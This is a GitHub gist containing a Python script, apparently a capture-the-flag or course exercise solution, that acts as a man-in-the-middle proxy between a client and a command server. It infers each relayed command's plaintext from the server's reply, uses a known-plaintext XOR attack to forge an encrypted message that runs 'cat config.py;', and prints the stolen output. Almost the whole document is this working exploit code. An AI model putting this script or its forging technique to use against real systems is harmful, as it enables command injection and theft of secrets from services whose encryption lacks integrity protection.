Created
April 6, 2019 15:17
-
-
Save arselzer/4c68de18776d66a351f95946589a614c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import subprocess | |
import shlex | |
import os | |
import threading | |
import socket | |
import sys | |
import re | |
import base64 | |
from Crypto.Util.Padding import pad, unpad | |
from Crypto.Cipher import AES | |
from Crypto.Util.strxor import strxor | |
#from Crypto.Util.Padding import pad, unpad | |
# Size in bytes of the leading and trailing fields sliced off an intercepted
# message (see steal_secret).
BLOCK_SIZE = 16
# NOTE(review): not referenced anywhere in the visible code.
CTR_SIZE = 4

# Commands a client is expected to send.  Index-aligned with `matchers`:
# matchers[i] recognises the server's response to cmds[i].
cmds = [
    "exec date -d @1267619929",
    "exec df -Tha --total",
    "exec du -ach | sort -h",
    "exec ps aux | grep -v grep | grep -i -e VSZ -e bash",
    "exec mount | column -t",
]

# Regular expressions searched for in a server response.  Raw strings are
# used so that `\d`, `\s` and `\.` reach the regex engine unchanged instead
# of being treated as (invalid) string escape sequences.
matchers = [
    r'\d\d:\d\d:\d\d UTC \d\d\d\d',
    r'Filesystem\s+Type\s+Size',
    r'\dK\s+\./',
    r'ps: not found',
    r'column: not found',
]

# NOTE(review): not referenced anywhere in the visible code.
buffer_size = 4096
# Upstream server endpoint; server_addr is overwritten from the CCMSERVER
# environment variable when the file is run as a script.
server_addr = "0.0.0.0"
server_port = 31337
# Local port the proxy listens on.
proxy_port = 31337
# Command substituted into the forged message by steal_secret.
evil_cmd = "cat config.py;"
def write_secret(secret):
    """Write *secret* to ``secret.txt`` in the current working directory.

    An existing file of that name is truncated first.

    Args:
        secret: Text to store.
    """
    # Write-only access is sufficient, and an explicit encoding keeps the
    # file contents independent of the platform's default locale.
    with open('secret.txt', 'w', encoding='utf-8') as secret_file:
        secret_file.write(secret)
def steal_secret(plaintext, ciphertext):
    """Rewrite an intercepted message to carry ``evil_cmd`` and send it.

    The message is split into ``iv || data || mac``, where ``iv`` and ``mac``
    are the first and last ``BLOCK_SIZE`` bytes.  ``data`` is treated as
    ``plaintext`` XOR-ed with a keystream, so the replacement payload is
    derived without knowing the key:

        C_1 = P_1 xor K   =>   K = C_1 xor P_1
        C_2 = P_2 xor K   =    P_2 xor C_1 xor P_1

    ``iv`` and ``mac`` are forwarded unchanged.  The result is base64-encoded,
    newline-terminated, sent to ``(server_addr, server_port)`` and the
    server's reply is printed.

    Args:
        plaintext: Bytes believed to be the plaintext of the payload.
        ciphertext: Raw (already base64-decoded) intercepted message.

    Raises:
        ValueError: If ``evil_cmd`` does not fit into ``plaintext`` or the
            payload length differs from ``len(plaintext)``.
        OSError: If connecting to or sending to the server fails.
    """
    iv = ciphertext[:BLOCK_SIZE]
    mac = ciphertext[-BLOCK_SIZE:]
    data = ciphertext[BLOCK_SIZE:-BLOCK_SIZE]

    # Validate lengths up front: the XOR below requires equal-length operands
    # and would otherwise fail with a far less helpful message.
    replacement = evil_cmd.encode()
    if len(replacement) > len(plaintext):
        raise ValueError("evil_cmd is longer than the known plaintext")
    if len(data) != len(plaintext):
        raise ValueError("payload length does not match the known plaintext")

    # Pad with NUL bytes (measured in bytes, not characters) up to the
    # length of the original command.
    replacement = replacement.ljust(len(plaintext), b'\0')

    # P_1 xor P_2, then xor C_1 to obtain C_2.
    xor1 = strxor(plaintext, replacement)
    new_data = strxor(xor1, data)
    print(data)
    print(new_data)

    msg = base64.b64encode(iv + new_data + mac) + b'\n'

    chunks = []
    # The context manager guarantees the socket is closed on every path.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
        server_socket.settimeout(1)
        server_socket.connect((server_addr, server_port))
        # sendall: a plain send() may transmit only part of the message.
        server_socket.sendall(msg)
        while True:
            try:
                server_data = server_socket.recv(1024)
            except socket.timeout:
                # No more data within the timeout: treat the reply as complete.
                break
            if not server_data:
                break
            chunks.append(server_data)

    # Decode once after reassembly so a multi-byte character split across
    # two recv() calls cannot raise.
    server_resp = b"".join(chunks).decode("utf-8", errors="replace")
    print(server_resp)
def attack_thread(ciphertext, server_resp):
    """Identify the relayed command from its response and hand off to steal_secret.

    ``server_resp`` is searched with each pattern in ``matchers``; the first
    match selects the command at the same position in ``cmds`` as the known
    plaintext.  If nothing matches, the function does nothing.

    Args:
        ciphertext: The client's message as text (base64).
        server_resp: The server's decoded response to that message.
    """
    # cmds and matchers are parallel lists, so walk them in lockstep.
    for known_cmd, pattern in zip(cmds, matchers):
        if not re.search(pattern, server_resp):
            continue
        try:
            raw_message = base64.b64decode(ciphertext)
        except ValueError:
            # binascii.Error is a ValueError subclass; non-ASCII input also
            # raises ValueError.  Report it instead of dying with a traceback.
            print("Intercepted message is not valid base64")
            return
        steal_secret(known_cmd.encode(), raw_message)
        break
def proxy_thread(client_conn, addr):
    """Relay one client connection to the server and spawn attack threads.

    For every chunk received from the client, the chunk is forwarded to
    ``(server_addr, server_port)``, the server's reply is forwarded back to
    the client, and an ``attack_thread`` is started with the client chunk and
    the collected reply.  Relaying stops when the client closes, the server
    closes, or a socket operation times out.  Both sockets are always closed
    on exit.

    Args:
        client_conn: Connected client socket (closed by this function).
        addr: Client address as returned by ``accept``; unused.
    """
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server_socket.settimeout(1)
        server_socket.connect((server_addr, server_port))

        server_open = True
        while server_open:
            try:
                client_data = client_conn.recv(1024)
                if not client_data:
                    break
                # sendall: a plain send() may transmit only part of the data.
                server_socket.sendall(client_data)

                chunks = []
                while True:
                    try:
                        server_data = server_socket.recv(1024)
                    except socket.timeout:
                        # Server went quiet: consider this reply complete.
                        break
                    if not server_data:
                        # Server closed its side; nothing more can be relayed.
                        server_open = False
                        break
                    chunks.append(server_data)
                    client_conn.sendall(server_data)

                # Decode leniently: the relayed bytes are arbitrary network
                # data and must not be able to kill the relay loop.
                server_resp = b"".join(chunks).decode("utf-8", errors="replace")
                client_text = client_data.decode("utf-8", errors="replace")
                threading.Thread(
                    target=attack_thread,
                    args=(client_text, server_resp),
                ).start()
            except socket.timeout:
                break
    finally:
        # Runs on every path, including a failed connect, so neither socket
        # is leaked.
        server_socket.close()
        client_conn.close()
if __name__ == "__main__":
    # The upstream server address comes from the environment; fail with a
    # clear message rather than a KeyError traceback when it is missing.
    server_addr = os.environ.get("CCMSERVER")
    if not server_addr:
        print("CCMSERVER environment variable is not set")
        sys.exit(1)

    proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        # bind() can fail just like listen() (e.g. port already in use), so
        # both are covered by the same handler.
        proxy_socket.bind(('', proxy_port))
        proxy_socket.listen()
    except OSError:
        proxy_socket.close()
        print("Error creating socket")
        sys.exit(1)

    try:
        while True:
            try:
                conn, addr = proxy_socket.accept()
            except OSError:
                # Only socket failures are treated as accept errors; a bare
                # except would also swallow KeyboardInterrupt/SystemExit.
                print("Socket accept error")
                sys.exit(1)
            conn.settimeout(1)
            # One relay thread per accepted client.
            threading.Thread(target=proxy_thread, args=(conn, addr)).start()
    except KeyboardInterrupt:
        print("Interrupted, shutting down")
    finally:
        proxy_socket.close()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment